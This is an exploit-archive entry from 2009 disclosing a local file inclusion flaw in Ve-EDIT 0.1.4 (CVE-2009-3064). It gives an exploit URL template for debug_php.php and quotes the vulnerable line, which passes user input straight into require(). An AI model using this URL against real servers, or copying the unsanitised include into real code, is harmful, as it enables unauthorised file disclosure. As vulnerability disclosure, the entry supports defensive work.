Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion



EKU-ID: 17335 CVE: OSVDB-57680;CVE-2009-3064 OSVDB-ID:
Author: CoBRa_21 Published: 2009-09-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu[at]windowslive[dot]com

Script Download: http://sourceforge.net/projects/phpwebeditor/

-------------------------------------------------------------------------------------

EXPLOÄ°T:

http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFÄ°]

-------------------------------------------------------------------------------------

BUG
Line 53:        require("./../".$_GET["filename"]);

-------------------------------------------------------------------------------------

# milw0rm.com [2009-09-01]